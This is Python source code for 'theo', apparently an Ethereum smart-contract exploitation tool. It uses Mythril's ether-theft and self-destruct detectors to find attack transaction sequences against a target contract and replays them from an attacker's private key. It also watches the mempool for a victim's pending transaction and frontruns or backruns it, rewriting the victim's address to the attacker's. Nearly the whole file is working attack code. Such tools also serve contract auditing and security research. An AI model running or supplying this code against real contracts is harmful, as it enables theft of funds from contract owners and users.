import json
from web3 import Web3
from theo.exploit.exploit import Exploit
from theo.exploit.tx import Tx
from theo import private_key_to_account


def exploits_from_file(
    file, rpcHTTP=None, rpcWS=None, rpcIPC=None, contract="", account_pk=""
):
    with open(file) as f:
        exploit_list = json.load(f)

    if rpcIPC is not None:
        print("Connecting to IPC: {rpc}.".format(rpc=rpcIPC))
        w3 = Web3(Web3.IPCProvider(rpcIPC))
    elif rpcWS is not None:
        print("Connecting to WebSocket: {rpc}.".format(rpc=rpcWS))
        w3 = Web3(Web3.WebsocketProvider(rpcWS))
    else:
        print("Connecting to HTTP: {rpc}.".format(rpc=rpcHTTP))
        w3 = Web3(Web3.HTTPProvider(rpcHTTP))

    exploits = []

    for exploit in exploit_list:
        txs = []
        for tx in exploit:
            txs.append(
                Tx(
                    data=tx.get("data", "0x"),
                    value=tx.get("value", 0),
                    name=tx.get("name", ""),
                )
            )

        exploits.append(
            Exploit(
                txs=txs,
                w3=w3,
                contract=contract,
                account=private_key_to_account(account_pk),
                account_pk=account_pk,
            )
        )

    return exploits



import jsonpickle, time


def private_key_to_account(pk: str):
    from eth_keys import keys
    from web3 import Web3

    account = keys.PrivateKey(Web3.toBytes(hexstr=pk))
    return account.public_key.to_checksum_address()


def dump(ob=None, filename=None):
    """Dumps the provided object to a file in json format.
    """
    if filename is None:
        filename = "{name}.json".format(name=time.time_ns())

    pickled = jsonpickle.encode(ob)
    with open(filename, "w") as f:
        f.write(pickled)



import json
import re
from mythril.exceptions import CriticalError
from mythril.mythril import MythrilAnalyzer, MythrilDisassembler, MythrilConfig
from mythril.ethereum.interface.rpc.client import EthJsonRpc
from web3 import Web3
from theo.exploit.exploit import Exploit
from theo.exploit.tx import Tx
from theo import private_key_to_account


def exploits_from_mythril(
    rpcHTTP="http://localhost:8545",
    rpcWS=None,
    rpcIPC=None,
    contract="",
    account_pk="",
    strategy="bfs",
    modules=["ether_thief", "suicide"],
    transaction_count=3,
    execution_timeout=120,
    max_depth=32,
    loop_bound=3,
    disable_dependency_pruning=False,
    onchain_storage_access=True,
    enable_online_lookup=False,
):
    if re.match(r"^https", rpcHTTP):
        host, port = rpcHTTP[8:].split(":")
        rpc_tls = True
    else:
        host, port = rpcHTTP[7:].split(":")
        rpc_tls = False

    try:
        # Disassembler
        disassembler = MythrilDisassembler(
            eth=EthJsonRpc(host=host, port=port, tls=rpc_tls),
            solc_version=None,
            solc_args=None,
            enable_online_lookup=enable_online_lookup,
        )
        disassembler.load_from_address(contract)
        # Analyzer
        analyzer = MythrilAnalyzer(
            strategy=strategy,
            disassembler=disassembler,
            address=contract,
            execution_timeout=execution_timeout,
            max_depth=max_depth,
            loop_bound=loop_bound,
            disable_dependency_pruning=disable_dependency_pruning,
            onchain_storage_access=onchain_storage_access,
        )
        # Generate report
        report = analyzer.fire_lasers(
            modules=modules, transaction_count=transaction_count
        )
    except CriticalError as e:
        print(e)
        return []

    if rpcIPC is not None:
        print("Connecting to IPC: {rpc}.".format(rpc=rpcIPC))
        w3 = Web3(Web3.IPCProvider(rpcIPC))
    elif rpcWS is not None:
        print("Connecting to WebSocket: {rpc}.".format(rpc=rpcWS))
        w3 = Web3(Web3.WebsocketProvider(rpcWS))
    else:
        print("Connecting to HTTP: {rpc}.".format(rpc=rpcHTTP))
        w3 = Web3(Web3.HTTPProvider(rpcHTTP))

    exploits = []

    for ri in report.issues:
        txs = []
        issue = report.issues[ri]

        for si in issue.transaction_sequence["steps"]:
            txs.append(Tx(data=si["input"], value=si["value"], name=si["name"]))

        exploits.append(
            Exploit(
                txs=txs,
                w3=w3,
                contract=contract,
                account=private_key_to_account(account_pk),
                account_pk=account_pk,
                title=issue.title,
                description=issue.description,
                swc_id=issue.swc_id,
            )
        )

    return exploits



class Tx:
    def __init__(self, data: str, value: str, name: str = None):
        # Transaction input (data)
        self.data = data
        # Transaction value
        if isinstance(value, str):
            # Transform from hex string
            if value[0:2].lower() == "0x":
                self.value = int(value, base=16)
            else:
                self.value = int(value)
        else:
            self.value = int(value)
        # Name
        self.name = name

    def __repr__(self):
        return "Transaction {{Name: {name}, Data: {input}, Value: {value_eth:.2f} ether ({value})}}".format(
            name=self.name,
            input=self.data,
            value_eth=self.value / 10 ** 18,
            value=self.value,
        )



# from argparse_prompt import PromptParser
import argparse
import code
import getpass
from web3 import Web3
from theo.version import __version__
from theo.scanner import exploits_from_mythril
from theo.file import exploits_from_file
from theo import *


def main():
    parser = argparse.ArgumentParser(
        description="Monitor contracts for balance changes or tx pool.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )

    # RPC connection type
    # Required HTTP connection
    parser.add_argument(
        "--rpc-http", help="Connect to this HTTP RPC", default="http://127.0.0.1:8545"
    )
    # Optional connections
    rpc = parser.add_argument_group("RPC connections")
    rpc.add_argument("--rpc-ws", help="Connect to this WebSockets RPC", default=None)
    rpc.add_argument("--rpc-ipc", help="Connect to this IPC RPC", default=None)

    # Account to use for attacking
    parser.add_argument("--account-pk", help="The account's private key")

    # Contract to monitor
    parser.add_argument(
        "--contract", help="Contract to interact with", metavar="ADDRESS"
    )

    # Find exploits with Mythril
    parser.add_argument(
        "--skip-mythril",
        help="Skip scanning the contract with Mythril",
        default=False,
        action="store_true",
    )

    # Load exploits from file
    parser.add_argument(
        "--load-file", type=str, help="Load exploit from file", default=""
    )

    # Print version and exit
    parser.add_argument(
        "--version", action="version", version="Version: {}".format(__version__)
    )

    # Parse all arguments
    args = parser.parse_args()

    # Get account from the private key
    if args.account_pk is None:
        args.account_pk = getpass.getpass(
            prompt="The account's private key (input hidden)\n> "
        )
    args.account = private_key_to_account(args.account_pk)

    if args.contract is None:
        args.contract = input("Contract to interact with\n> ")

    args.contract = Web3.toChecksumAddress(args.contract)
    args.account = Web3.toChecksumAddress(args.account)

    start_repl(args)


def start_repl(args):
    exploits = []

    # Transactions to frontrun
    if args.skip_mythril is False:
        print(
            "Scanning for exploits in contract: {contract}".format(
                contract=args.contract
            )
        )
        exploits += exploits_from_mythril(
            rpcHTTP=args.rpc_http,
            rpcWS=args.rpc_ws,
            rpcIPC=args.rpc_ipc,
            contract=args.contract,
            account_pk=args.account_pk,
        )
    if args.load_file != "":
        exploits += exploits_from_file(
            file=args.load_file,
            rpcHTTP=args.rpc_http,
            rpcWS=args.rpc_ws,
            rpcIPC=args.rpc_ipc,
            contract=args.contract,
            account_pk=args.account_pk,
        )

    if len(exploits) == 0:
        print("No exploits found. You're going to need to load some exploits.")
    else:
        print("")
        print("Found exploits(s):")
        print(exploits)

    # Create a web3 instance
    w3 = Web3(Web3.HTTPProvider(args.rpc_http, request_kwargs={"timeout": 60}))

    # Imports for REPL
    import os, atexit, readline, rlcompleter

    # Load history
    history_path = os.path.join(os.environ["HOME"], ".theo_history")
    if os.path.isfile(history_path):
        readline.read_history_file(history_path)
    # Trigger history save on exit
    atexit.register(readline.write_history_file, history_path)
    # Load variables
    vars = globals()
    vars.update(locals())
    # Start REPL
    readline.set_completer(rlcompleter.Completer(vars).complete)
    readline.parse_and_bind("tab: complete")
    del os, atexit, readline, rlcompleter
    code.InteractiveConsole(vars).interact(
        banner="""
Tools available in the console:
- `exploits` is an array of loaded exploits found by Mythril or read from a file
- `w3` an initialized instance of web3py for the provided HTTP RPC endpoint
- `dump()` writing a json representation of an object to a local file

Check the readme for more info:
https://github.com/cleanunicorn/theo

Theo version {version}.

""".format(
            version=__version__
        )
    )

    print("Shutting down")



from web3 import Web3
import time
import logging


class Exploit:
    def __init__(
        self,
        txs: list,
        w3: Web3,
        contract: str,
        account: str,
        account_pk: str,
        title: str = None,
        description: str = None,
        swc_id: int = 0,
        verbosity: int = logging.INFO,
    ):
        # Web3 instance (can be HTTP, WebSockets, IPC)
        self.w3 = w3
        # Meta information
        self.title = title
        self.description = description
        self.swc_id = swc_id
        # Transaction list
        self.txs = txs

        # Contract to attack
        self.contract = Web3.toChecksumAddress(contract)
        # Account to send transactions from
        self.account = Web3.toChecksumAddress(account)
        # Account's private key
        self.account_private_key = account_pk

        # Gas price when executing exploit
        self.gas_price = 1 ** 10
        # Gas price increment when frontrunning
        self.gas_price_increment = 1
        # Gas value when `gas_estimate` is False
        self.gas = 200000
        # Gas increment when frontrunning
        self.gas_increment = 1
        # Estimate gas when sending transactions
        self.gas_estimate = True

        # Sleep in seconds when scanning mem pool
        self.sleep = 1

        # Wait for transactions to be mined
        self.wait = True

        # Logging
        self.logger = logging.getLogger("Exploit")
        logger_stream = logging.StreamHandler()
        logger_stream.setLevel(verbosity)
        logger_stream.setFormatter(logging.Formatter("%(asctime)s - %(message)s"))
        if self.logger.hasHandlers() is False:
            self.logger.addHandler(logger_stream)

    def __repr__(self):
        return """Exploit: {title}
Description: {description}
SWC ID: {swc_id}
Transacion list: {txs}""".format(
            title=self.title,
            description=self.description,
            swc_id=self.swc_id,
            txs=self.txs,
        )

    def execute(self, nonce=None):
        receipts = []

        if nonce is None:
            nonce_index = self.w3.eth.getTransactionCount(self.account)
        else:
            nonce_index = nonce

        initial_balance = self.w3.eth.getBalance(self.account)

        for tx in self.txs:
            run_tx = {
                "from": self.account,
                "to": self.contract,
                "gasPrice": self.gas_price,
                "gas": self.gas,
                "value": tx.value,
                "data": tx.data.replace(
                    "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef", self.account[2:]
                ),
                "nonce": nonce_index,
            }
            nonce_index += 1

            # Estimate gas
            if self.gas_estimate is True:
                self.logger.debug("Estimating gas for tx: {tx}".format(tx=run_tx))
                run_tx["gas"] = self.w3.eth.estimateGas(run_tx)

            receipts.append(self.send_tx(run_tx))

        final_balance = self.w3.eth.getBalance(self.account)
        self.logger.info(
            "Initial balance: \t{balance_ether:.2f} ether ({balance})".format(
                balance=initial_balance, balance_ether=initial_balance / 10 ** 18
            )
        )
        self.logger.info(
            "Final balance: \t{balance_ether:.2f} ether ({balance})".format(
                balance=final_balance, balance_ether=final_balance / 10 ** 18
            )
        )

        self.logger.debug(receipts)

    def _front_back_run(
        self, flush=False, nonce_index=None, wait_txs=None, send_txs=None, run_type=None
    ):
        if run_type is None:
            self.logger.error(
                "Must specify if it should frontrun or backrun transactions."
            )
            return

        self.logger.info("Scanning the mem pool for transactions...")

        if nonce_index is None:
            nonce_index = self.w3.eth.getTransactionCount(self.account)
        else:
            nonce_index = nonce_index

        initial_balance = self.w3.eth.getBalance(self.account)

        # If we don't specify a different set of transactions to wait for, use the ones in the exploit
        if wait_txs is None:
            wait_txs = self.txs

        # If we don't specify a different set of transactions to send, use the ones in the exploit
        if send_txs is None:
            send_txs = self.txs

        if len(wait_txs) != len(send_txs):
            self.logger.error(
                "The number of transactions we're waiting for needs to match the number of transactions to send. {wait_len} != {send_len}".format(
                    wait_len=len(wait_txs), send_len=len(send_txs)
                )
            )
            return

        # Wait for each tx and frontrun it.
        index = 0
        for tx in wait_txs:
            self.logger.info("Waiting for tx: {tx}".format(tx=tx))

            victim_tx = self.wait_for(self.contract, tx, flush=flush)
            self.logger.info(
                "Found tx: {hash}".format(hash=victim_tx.get("hash").hex())
            )

            run_tx = {
                "from": self.account,
                "to": self.contract,
                "data": send_txs[index]
                .data.replace(
                    "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef", self.account[2:]
                )
                .replace(victim_tx["from"], self.account[2:]),
                "gas": victim_tx["gas"] + self.gas_increment,
                "value": send_txs[index].value,
                "nonce": nonce_index,
            }
            if run_type == "frontrun":
                run_tx["gasPrice"] = hex(
                    victim_tx["gasPrice"] + self.gas_price_increment
                )
            elif run_type == "backrun":
                run_tx["gasPrice"] = hex(
                    victim_tx["gasPrice"] - self.gas_price_increment
                )

            nonce_index += 1

            # Estimate gas
            if self.gas_estimate is True:
                try:
                    run_tx["gas"] = self.w3.eth.estimateGas(run_tx) + self.gas_increment
                    self.send_tx(run_tx)
                except ValueError:
                    self.logger.error("Could not estimate gas.")
                except Exception as e:
                    self.logger.error("Exception caught: {}".format(e))
            else:
                self.send_tx(run_tx)

            index += 1

        final_balance = self.w3.eth.getBalance(self.account)
        self.logger.info(
            "Initial balance: \t{balance} ({balance_ether:.2f} ether)".format(
                balance=initial_balance, balance_ether=initial_balance / 10 ** 18
            )
        )
        self.logger.info(
            "Final balance: \t{balance} ({balance_ether:.2f} ether)".format(
                balance=final_balance, balance_ether=final_balance / 10 ** 18
            )
        )

    def frontrun(self, flush=False, nonce_index=None, wait_txs=None, send_txs=None):
        self._front_back_run(
            flush=flush,
            nonce_index=nonce_index,
            wait_txs=wait_txs,
            send_txs=send_txs,
            run_type="frontrun",
        )

    def backrun(self, flush=False, nonce_index=None, wait_txs=None, send_txs=None):
        self._front_back_run(
            flush=flush,
            nonce_index=nonce_index,
            wait_txs=wait_txs,
            send_txs=send_txs,
            run_type="backrun",
        )

    def send_tx(self, tx: dict) -> str:
        # Make sure the addresses are checksummed.
        tx["to"] = Web3.toChecksumAddress(tx["to"])

        signed_tx = self.w3.eth.account.signTransaction(tx, self.account_private_key)
        self.logger.info("Sending tx: {tx}".format(tx=tx))
        tx_hash = self.w3.eth.sendRawTransaction(signed_tx.rawTransaction)
        if self.wait is True:
            self.logger.info(
                "Waiting for {tx_hash} to be mined...".format(tx_hash=tx_hash.hex())
            )
            tx_receipt = self.w3.eth.waitForTransactionReceipt(tx_hash, timeout=300)
            self.logger.info("Mined")
            self.logger.debug("Receipt: {}".format(tx_receipt))
            return tx_receipt
        else:
            return None

    def wait_for(self, contract, tx, flush=False):
        # Setting up filter
        pending_filter = self.w3.eth.filter("pending")

        # Ignore existing transactions and wait for new ones
        if flush is True:
            self.logger.debug(
                "Flushing {} existing transactions.".format(
                    len(pending_filter.get_new_entries())
                )
            )

        while True:
            time.sleep(self.sleep)
            pending_txs_hashes = pending_filter.get_new_entries()
            self.logger.debug(
                "Processing {} transactions.".format(len(pending_txs_hashes))
            )
            for tx_hash in pending_txs_hashes:
                pending_tx = self.w3.eth.getTransaction(tx_hash)

                # Skip some uninteresting transactions
                if (pending_tx is None) or (pending_tx.get("to") is None):
                    continue

                # Skip transactions already mined
                if pending_tx.get("blockNumber") is not None:
                    continue

                if (pending_tx.get("to", str("")).lower() == contract.lower()) and (
                    pending_tx.get("input", "").lower() == tx.data.lower()
                    and (pending_tx.get("value", 0) == tx.value)
                ):
                    self.logger.debug(
                        "Found pending tx: {tx} from: {sender}.".format(
                            tx=pending_tx.get("hash", b"0").hex(),
                            sender=pending_tx.get("from"),
                        )
                    )
                    return pending_tx

    def dump_to_file(self, file=None):
        from theo import dump

        exploit_object = []
        for tx in self.txs:
            exploit_object.append(tx.__dict__)

        dump(ob=[exploit_object], filename=file)
